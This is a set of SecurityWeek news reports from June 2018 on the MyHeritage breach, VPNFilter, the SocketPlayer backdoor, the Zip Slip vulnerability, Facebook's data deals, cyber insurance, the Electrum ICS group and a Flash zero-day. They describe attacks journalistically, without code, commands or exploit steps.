The unknown quality of the hashing function could make the credential cracking more difficult, but not necessarily impossible. Furthermore, it may not be necessary if the user has had the same password with the same email address stolen in a different breach with a weak hash function. SecurityWeek has contacted MyHeritage asking for further details on the hashing process, and will update this report with any response.

Rick Moy, CMO at Acalvio, is concerned that MyHeritage did not itself detect the intrusion, "as demonstrated by the seven-month delay, and the fact they were alerted by a third party." The implication is that the firm does not have adequate detection capabilities – and if it failed to detect this, there may be other incidents with the other systems that have also gone undetected.

This possibility also concerns Rashmi Knowles, EMEA Field CTO at RSA Security. "If your password is stolen, it can be updated, but this isn't the case with genetic information," she warns. "You only have one genetic identity, so if this is stolen there are potentially much more serious consequences. But many people don't think about this when applying for such services. No matter how secure the organization, no one is completely risk-free, and if breached, genetic data could be sold on to other hackers without your consent, or the characteristic data it contains could be used to hijack your online accounts. There's even a possibility that hackers can amend or even delete genetic data in some cases, which could have serious implications for the victim and the level of healthcare or even health insurance they could access in the future."

There is potentially an additional side-story to this incident. MyHeritage reports, "We are taking steps to inform relevant authorities including as per GDPR." SecurityWeek has asked MyHeritage to expand on this. Who are the relevant GDPR authorities for MyHeritage?

The firm lists numerous contact phone numbers in various European countries, including the provision of "24/7 support" from the Irish phone. This suggests that the Irish regulator may be the relevant GDPR authority for MyHeritage. There is little doubt that MyHeritage is liable under GDPR, and it seems that it is reachable by the GDPR authorities via its European offices. The only question here is whether Europe will decide to make a high-profile example of MyHeritage early into the GDPR age.

But what about the researcher? Is he or she also liable under GDPR for unsanctioned storage of and access to European PII? It is a moot point. The UK's Information Commissioner's Office has told SecurityWeek that researchers are exempt from GDPR under the principle of 'legitimate interest'.

This is not the view of David Flint, senior partner at MacRoberts LLP. Asked if researchers should be concerned about GDPR, he told SecurityWeek, "The short answer is YES! Under the GDPR/DPA 2018 the researcher couldn't be a Processor (as he is not acting on instructions of a Controller) therefore he must be a Controller."

So, as a controller, "If a researcher comes across that data he should advise all the Data Subjects that he has the data and what he intends to do with it, sending them a Privacy Notice. (article 14). Article 89 GDPR deals with an exemption for historical research which doesn't seem relevant here."

It is interesting times. MyHeritage users will need to wait to see if their DNA has or may be compromised, researchers will need to wait to see if GDPR may be enforced against them; and businesses around the world – including MyHeritage – will be waiting to see how forcefully GDPR will be enforced by the European Union.

Update

In a new blog posted Wednesday, MyHeritage has announced that it will be retiring all existing MyHeritage passwords. "To maximize the security of our users, we have started the process of expiring ALL user passwords on MyHeritage," writes CISO Omer Deutsch. "This process will take place over the next few days. It will include all 92.3 million affected user accounts plus all 4 million additional accounts that have signed up to MyHeritage after the breach date of October 26, 2017. As of now, we’ve already expired the passwords of more than half of the user accounts on MyHeritage. Users whose passwords were expired are forced to set a new password and will not be able to access their account and data on MyHeritage until they complete this."


ALTR Emerges From Stealth With Blockchain-Based Data Security Solution
7.6.2018 securityweek Security

Austin, Texas-based ALTR emerged from stealth mode on Wednesday with a blockchain-based data security platform and $15 million in funding.

ALTR announced the immediate availability of its product, which has been in development for nearly four years while the company operated in stealth mode.

Originally designed to serve as the public transactions ledger for the Bitcoin cryptocurrency, blockchain is a distributed database consisting of blocks that are linked and secured using cryptography. Companies have been increasingly using blockchain for purposes other than cryptocurrency transactions, including for identity verification and securing data and devices.

ALTR’s platform uses blockchain technology for secure data access and storage. Built on what the company names ALTRchain, the solution allows organizations to monitor, access and store highly sensitive information.

ALTR emerges from stealth

The ALTR platform is designed to sit between data and applications, and it can be deployed without making any changes to existing software or hardware infrastructure. It offers support for all major database systems, including from Oracle, Microsoft and others.

The platform has three main components: ALTR Monitor, ALTR Govern, and ALTR Protect. ALTR Monitor provides intelligence on data access activities, creating an audit trail of blockchain-based log files.

ALTR Govern is designed for controlling how users access business applications. Organizations can create and apply rule-based locks and access thresholds in an effort to prevent breaches.

ALTR Protect is designed to protect data at rest. It decentralizes sensitive data and stores it across a private blockchain in an effort to protect it against unauthorized access in case any single node has been compromised.

The company also announced that it has opened access to its proprietary blockchain technology by making available its ChainAPI, which allows developers to add ALTRchain to their applications.

ALTR has raised $15 million in funding from private and institutional sources in the cybersecurity, financial services and IT sectors. The money will be used to extend the reach of the company’s platform and launch additional products based on ALTRchain.

ALTR told SecurityWeek that its platform has already been deployed at a healthcare organization, a mid-sized service provider that caters to both Fortune 1000 companies and government agencies, and a couple of firms in the financial services sector.


VPNFilter Targets More Devices Than Initially Thought
7.6.2018 securityweek
Virus

Researchers continue to analyze the VPNFilter attack and they have discovered new capabilities and determined that the threat targets a larger number of devices than initially believed.

Cisco Talos’ initial report on VPNFilter said the threat targeted 16 routers and network-attached storage (NAS) devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. It turns out that not only is the malware capable of hacking more device models from these vendors, it can also take control of products from ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.

Talos now lists a total of more than 50 impacted devices. While researchers have identified a sample targeting UPVEL products, they have not been able to determine exactly which models are affected.

Experts have also found a new stage 3 endpoint exploitation module that injects malicious content into traffic as it passes through a compromised network device.

The new module, dubbed “ssler,” provides data exfiltration and JavaScript injection capabilities by intercepting traffic going to port 80. Attackers can control which websites are targeted and where the stolen data is stored.

“With this new finding, we can confirm that the threat goes beyond what the actor could do on the network device itself, and extends the threat into the networks that a compromised network device supports,” Talos explained.

Another new stage 3 module discovered after the initial analysis, dubbed “distr,” allows stage 2 modules to remove the malware from a device and then make that device unusable.

One interesting capability of VPNFilter is to monitor the network for communications over the Modbus SCADA protocol. Talos has conducted further analysis of this sniffer and published additional details.

When it was discovered, the VPNFilter botnet had ensnared roughly 500,000 devices across 54 countries. However, experts believe the main target is Ukraine and, along with U.S. authorities, attributed the threat to Russia, specifically the group known as Sofacy, with possible involvement of the actor tracked as Sandworm.

The FBI has managed to disrupt the botnet by seizing one of its domains, but researchers noticed that the attackers have not given up and continue to target routers in Ukraine.


Backdoor Uses Socket.io for Bi-directional Communication
7.6.2018 securityweek
Virus

A recently discovered remote access Trojan is using a specialized program library that allows operators to interact with the infected machines directly, without an initial “beacon” message, G Data reports.

Dubbed SocketPlayer, the backdoor stands out because it doesn’t use the typical one-way communication system that most banking Trojans, backdoors, and keyloggers use. Instead, it employs the socket.io library, which enables real-time, bi-directional communication between applications.

Because of this feature, the malware handler no longer has to wait for the infected machine to initiate communication, and the malware operator can contact the compromised computer on their own.

G Data security researchers observed two variants of SocketPlayer in the wild, one acting as a downloader capable of executing arbitrary code from a website, while the other featuring more complex capabilities, including detection and sandbox evasion mechanisms.

Once it has been installed on a compromised machine, the malware waits for commands from the operator, and can perform a variety of actions, such as sniffing through drives, screenshot recording, fetching and running code, and more.

The researchers also discovered that other functions are also selectable, though they do not appear to have been implemented yet. One of them, for example, appears to have been intended as a keylogger, though no actual keylogging functionality is present in the backdoor.

The observed malware sample was being distributed through an Indian website, but it’s unclear how the backdoor spreads. Regardless of whether the website was used for infection purposes or only as a mirror, the malicious file remained unnoticed on it for a long time.

The first variant of SocketPlayer was first submitted to VirusTotal on March 28, with a second sample submitted on March 31, G Data explains in a technical report (PDF).

The infection routine starts with the downloader checking if it runs in a sandboxed environment. If it doesn’t, it fetches an executable file, decrypts it, and uses the Invoke method to run it in memory.

The invoked program creates a socket connection to the host hxxp://93.104.208.17:5156/socket.io, as well as a registry key to achieve persistence. It also checks if a Process Handler/ folder exists and creates it if it doesn’t. Next, the program creates an autostart key with the value “Handler.”

It also downloads another executable, which in turn downloads SocketPlayer, decrypts it, and runs it in memory.

The security researchers also noticed that the two variants of the backdoor went through a series of changes between samples, such as the use of a new command and control port, new file locations, different information sent in the initial routine, new commands added to the server, and new functionality included in the malware.


Critical Vulnerability Addressed in Popular Code Libraries
7.6.2018 securityweek
Vulnerebility

A critical and widespread arbitrary file overwrite vulnerability has been addressed in popular libraries of projects from HP, Amazon, Apache, Pivotal, and more.

Dubbed Zip Slip and discovered by the Snyk Security, the vulnerability exists when the code that extracts files from an archive doesn’t validate the file paths in the archive.

The security flaw was responsibly disclosed to the impacted parties starting in mid-April and is said to impact thousands of projects. The issue has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go.

According to Snyk Security, Java has been impacted the most, as it lacks a central library for the high level processing of archive files. Because of that, vulnerable code snippets “were being hand crafted and shared among developer communities such as StackOverflow,” the security researchers explain.

Exploitation is possible via a specially crafted archive containing directory traversal filenames. Numerous archive formats are affected by the bug, including tar, jar, war, cpio, apk, rar and 7z.

“Zip Slip is a form of directory traversal that can be exploited by extracting files from an archive,” Snyk Security explains.

The directory traversal vulnerability allows an attacker to access parts of the file system residing outside of their target folder. The attacker can then overwrite executable files and achieve remote command execution on the victim’s machine when these files are executed. The flaw can also be abused to overwrite configuration files or other sensitive resources.

“The two parts required to exploit this vulnerability is a malicious archive and extraction code that does not perform validation checking,” the researchers explain.

First, the archive should contain one or more files designed to break out of the target directory when extracted. The contents of the archive need to be hand crafted, as archive creation tools “don’t typically allow users to add files with these paths,” Snyk Security notes. Armed with the right tools, however, an attacker can easily create files with these paths.

Second, the attacker needs to extract the archive, either using a library or own code.

“You are vulnerable if you are either using a library which contains the Zip Slip vulnerability or your project directly contains vulnerable code, which extracts files from an archive without the necessary directory traversal validation,” the researchers say.

In a GitHub repository, Snyk published a list of impacted libraries, which includes npm (language JavaScript), Java (language Java), .NET (languages: .NET and Go), Ruby gem (language Ruby), Go (language Go), Oracle (language Java), and Apache (language Java).

“Of the many thousands of projects that have contained similar vulnerable code samples or accessed vulnerable libraries, the most significant include: Oracle, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Jenkinsci, Eclipse, OWASP, SonarCube, OpenTable, Arduino, ElasticSearch, Selenium, Gradle, JetBrains and Google,” the researchers note.

Snyk also notes that some projects were patched despite being confirmed not vulnerable, while others that continue to use the vulnerable code implementation are said to be not exploitable. Specifically, “it is believed that it would not be possible to attack these projects in such a way that could lead to a malicious outcome,” the researchers say.


Facebook Deals With Chinese Firm Draw Ire From U.S. Lawmakers
7.6.2018 securityweek
Social

Facebook drew fresh criticism from US lawmakers following revelations that it allowed Chinese smartphone makers, including one deemed a national security threat, access to user data.

The world's largest social network confirmed late Tuesday that China-based Huawei -- which has been banned by the US military and a lightning rod for cyberespionage concerns -- was among device makers authorized to see user data.

Facebook has claimed the agreements with some 60 device makers dating from a decade ago were designed to help the social media giant get more services into the mobile ecosystem.

Nonetheless, lawmakers expressed outrage that Chinese firms were given access to user data at a time when officials were trying to block their access to the US market over national security concerns.

Senator Ed Markey said Facebook's chief executive has some more explaining to do following these revelations.

"Mark Zuckerberg needs to return to Congress and testify why @facebook shared Americans' private information with questionable Chinese companies," the Massachusetts Democrat said on Twitter.

"Our privacy and national security cannot be the cost of doing business."

Other lawmakers zeroed in on the concerns about Huawei's ties to the Chinese government, even though the company has denied the allegations.

"This could be a very big problem," tweeted Senator Marco Rubio, a Florida Republican.

"If @Facebook granted Huawei special access to social data of Americans this might as well have given it directly to the government of #China."

Representative Debbie Dingell called the latest news on Huawei "outrageous" and urged a new congressional probe.

"Why does Huawei, a company that our intelligence community said is a national security threat, have access to our personal information?" said Dingell, a Michigan Democrat, on Twitter.

"With over 184 million daily Facebook users in US & Canada, the potential impact on our privacy & national security is huge."

'Approved experiences'

Facebook, which has been blocked in China since 2009, also had data-access deals with Chinese companies Lenovo, OPPO and TCL, according to the company, which had similar arrangements with dozens of other devices makers.

Huawei, which has claimed national security fears are unfounded, said in an emailed statement its access was the same as other device makers.

"Like all leading smartphone providers, Huawei worked with Facebook to make Facebook's service more convenient for users. Huawei has never collected or stored any Facebook user data."

The revelations come weeks after Zuckerberg was grilled in Congress about the hijacking of personal data on some 87 million Facebook users by Cambridge Analytica, a consultancy working on Donald Trump's 2016 campaign.

Facebook said its contracts with phone makers placed tight limits on what could be done with data, and "approved experiences" were reviewed by engineers and managers before being deployed, according to the social network.

Any data obtained by Huawei "was stored on the device, not on Huawei's servers," according to Facebook mobile partnerships chief Francisco Varela.

Facebook said it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

It has argued the data-sharing with smartphone makers was different from the leak of data to Cambridge Analytica, which obtained private user data from a personality quiz designed by an academic researcher who violated Facebook's rules.

Facebook is winding up the interface arrangements with device makers as the company's smartphone apps now dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The news comes following US sanctions on another Chinese smartphone maker, ZTE -- which was not on the Facebook list -- for violating export restrictions to Iran.

The ZTE sanctions limiting access to US components could bankrupt the manufacturer, but Trump has said he is willing to help rescue the firm, despite objections from US lawmakers.


AXA Partners With SecurityScorecard to Set Cyber Insurance Premiums
7.6.2018 securityweek Cyber

AXA Will Use Ratings From SecurityScorecard to Help Set Premiums for Insurance Agreements

Cyber insurance is a problem. It is a new industry with huge potential but great difficulties. Getting premiums right is an example -- the cyber insurer needs to fully understand the financial risk it incurs in able to set premiums high enough to cover the risk and still make a profit, but low enough not to kill the market.

Steve Durbin, managing director of the Information Security Forum, describes the problem. "We have already seen that the financial impact of some information security risks is being transferred through cyber insurance," he told SecurityWeek.

"However, moving forward, I anticipate that several large data breaches will expose aggregated risks and cause insurers to suffer significant financial losses. As a result of this mispricing debacle, several insurers will be forced out of business while others will raise premiums significantly, expand contract exclusions and restrictions, or avoid cyber insurance altogether. This will make cyber insurance no longer financially viable for many organizations, and the market will contract and take several years to recover."

Quite simply, data breaches are happening with increasing frequency (another 92 million passwords exposed by MyHeritage this week). At the same time, the cost of recovery continues to escalate rapidly, and the quantity and severity of cyber regulations, such as GDPR, is expanding.

The insurance industry traditionally relies on actuarial tables -- effectively a database of experience -- to set its premiums. While insurance companies are currently busy compiling such data on historical breaches, they have nothing like the depth of, for example, motor insurance actuarial tables.

"Currently, most policy premiums are based on self-assessments," comments Greg Reber, CEO at consulting firm AsTech. This leads to its own problems. False assessments, even unintentional errors, could lead to reduced payouts in extremis. It is a strange irony that the best premiums will only be obtainable by the organizations that least need to transfer their risk to the insurance industry. At the same time, any companies that seek to rely on insurance alone to handle their risk are likely to come unstuck.

SecurityScorecard and AXA (the world's largest insurance company) believe they have found a solution to the premium problem. SecurityScorecard is a firm that rates the cybersecurity posture of web-enabled firms. It does not wait to be asked -- and the result is a growing database of independent security ratings on the world's web-enabled businesses. Currently, it continuously monitors more than 200,000 businesses and gives them a security score from A to F. Empirical evidence suggests it works: "Companies that rate as a D or F are 5.4 times more likely to be breached than companies that rate as an A or a B," claims the company.

AXA has now entered an agreement with SecurityScorecard to have access to these ratings, and will use them to help set the premium for its insurance agreements. "The SecurityScorecard platform," explains Scott Sayce, global chief underwriting officer of cyber at AXA, "will help us rapidly evaluate companies to understand their cyberhealth and provide our underwriters with crucial information needed to evaluate an insured's risk.”

"AXA and SecurityScorecard are pioneering the cyber insurance industry,” adds Aleksandr Yampolskiy, CEO and co-founder at SecurityScorecard. This partnership demonstrates the value of the SecurityScorecard platform and the trust top business leaders have in our score. Our vision is to create a ubiquitous language for cybersecurity that facilitates collaboration and communication between business partners.”

Rather than relying on subjective, manual self-assessments from the customer, "They're going to be using the objective, automated, security metrics that we provide to make their insurance decisions," Yampolskiy told SecurityWeek. "They will feed that data into their algorithms and then decide, do I increase the premium because the customer's security posture looks risky, do I lower the premium, or maybe in some cases do I just flat out refuse to provide the cyber insurance?"

Our data, he continued, provides "objective measurements to create the scientific basis for making those insurance decisions. AXA plans to start underwriting thousands and thousands of European businesses." It is the small to medium sized business that most needs cyber insurance. "If you're an Equifax or a Target and you get hacked," continued Yampolskiy, "you might survive. But if you're a small company, you will not. So, AXA is planning to start using our technology to start making those cyber insurance policies that apply to thousands of those businesses," The advantage for those small businesses is they will be able to realistically set premiums, but will also learn their SecurityScorecard rating. "And that provides a lot of reciprocal benefit," he added.

Will this relationship be enough to kickstart a serious cyber insurance industry? It will probably happen anyway, but it may take time if left to its own devices. SecurityWeek asked Yampolskiy if cyber insurance might join the ranks of other insurances that are required by law.

"My belief is, yes," said Yampolskiy, "at some point in the future. We've reached the point where all companies are part of a larger interconnected ecosystem." He raised the example of Target, a large company breached through a small member of its supply chain. Target lost millions of dollars because of a smaller company, that would not of its own resources be able to provide recompense. "It's hard to predict the future," he said, "but I can see a time when all companies are required to have cyber insurance."

By providing a scientific basis for the insurance industry to use for premium-setting, Yampolskiy believes SecurityScorecard and AXA are moving the market toward the time when cyber insurance is not merely standard, but possibly required.

SecurityScorecard is based in New York. It was founded in 2013, and raised $12.5 in Series A funding led by Sequoia Capital in 2015; $20 million Series B in 2016; and $27.5 million Series C in 2017. Its stated mission is "to empower every organization with collaborative security intelligence."


Group That Caused Power Outage Stops Focusing Exclusively on Ukraine
7.6.2018 securityweek ICS

Electrum, the Russia-linked hacker group believed to be responsible for the 2016 power outage in Ukraine, no longer focuses exclusively on this country, according to industrial cybersecurity firm Dragos.

Electrum is said to have used Crashoverride/Industroyer, a piece of malware designed to target industrial control systems (ICS), to cause the power outage in December 2016. Researchers have also found links to Sandworm (aka TeleBots and BlackEnergy), which has been blamed for the 2015 power outage that hit Ukraine. Sandworm is also believed to have played a role in the ongoing VPNFilter campaign.

According to Dragos, Electrum initially focused on development and facilitating Sandworm attacks. However, starting with the Crashoverride attack, it took on operational tasks as well.

The group is still active and starting with last year it has been seen focusing on organizations outside of Ukraine. While Dragos is unable to disclose which regions have been targeted, the company tells SecurityWeek that the hackers have launched attacks on organizations in the water and electric sectors.

The security firm has been monitoring Electrum and earlier this year it came across new information on the threat actor’s infiltration techniques and capabilities of the Crashoverride malware. Researchers say the group relies on common attack methods rather than zero-day vulnerabilities and exploits.

“For instance, the group used Microsoft SQL database servers as the gateway that bridges both the business and industrial control networks, to successfully compromise industrial control systems where they used stolen credentials to execute code,” explained Sergio Caltagirone, director of threat intelligence at Dragos.

The company told SecurityWeek it had not identified any new deployment of the Crashoverride malware. “Crashoverride was a very specific framework for electric grid attacks. We would only expect to see this immediately prior to an ICS impact,” it said.

“The group’s ongoing activity and link to the Sandworm team indicate Electrum’s sponsor could direct ICS disruption operations to other geographic areas,” Caltagirone noted. “Dragos considers Electrum to be one of the most competent and sophisticated threat actors currently in the ICS industry.”

Dragos has published brief reports on several of the groups that pose a threat to ICS, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime, the group believed to be behind the Triton/Trisis attacks.

Last week, it reported that a threat actor linked to North Korea’s Lazarus Group had stopped targeting organizations in the United States.


Adobe Patches Flash Zero-Day Exploited in Targeted Attacks
7.6.2018 securityweek
Vulnerebility

[Updated] Security updates released by Adobe on Thursday for Flash Player patch four vulnerabilities, including a critical flaw that has been exploited in targeted attacks.

The vulnerability that has been exploited in the wild is tracked as CVE-2018-5002, and it has been described by Adobe as a stack-based buffer overflow that can be leveraged for arbitrary code execution.

The security hole was independently reported to Adobe by researchers at ICEBRG, Qihoo 360 and Tencent.

The researchers have yet to share any details, but Adobe did mention that CVE-2018-5002 has been exploited in limited, targeted attacks against Windows users. Hackers deliver the exploit via malicious Office documents that include specially crafted Flash content. The documents are distributed via email.

The latest version of Flash Player, 30.0.0.113, also patches a critical type confusion vulnerability that can lead to code execution (CVE-2018-4945), an “important” severity integer overflow that can result in information disclosure (CVE-2018-5000), and an “important” out-of-bounds read issue that can also lead to information disclosure (CVE-2018-5001).

CVE-2018-5000 and CVE-2018-500 were reported anonymously through Trend Micro’s Zero Day Initiative (ZDI), while CVE-2018-4945 was reported to Adobe by researchers at Tencent.

Despite Adobe’s plans to kill Flash Player by 2020, threat actors apparently still find zero-day vulnerabilities highly useful.

This is the second zero-day discovered in 2018. The first was patched in February after North Korean hackers exploited it for several months in attacks aimed at South Korea.

UPDATE. According to the Advanced Threat Response Team at 360 Core Security, which discovered the Flash exploit on June 1, attacks involving CVE-2018-5002 appear to be mainly aimed at entities in the Middle East.

The exploit has been delivered using a specially crafted Excel spreadsheet named “salary.xlsx,” which includes salary information written in Arabic. A malicious SWF file that contains the zero-day exploit is downloaded from a remote server once the spreadsheet is opened. Researchers say the goal is to download a Trojan, but they have not provided any information on the malware.

Data collected from the command and control (C&C) server suggests that hackers have been making preparations for the attack since February. The C&C domain is designed to mimic a job search website in the Middle East and its name suggests that the target is located in Doha, Qatar.

360 Core Security has published technical details on CVE-2018-5002, which makes it easier for other threat groups to start exploiting the flaw.

UPDATE 2. ICEBRG’s Security Research Team (SRT) has also published a blog post detailing the attack and the Flash Player vulnerability.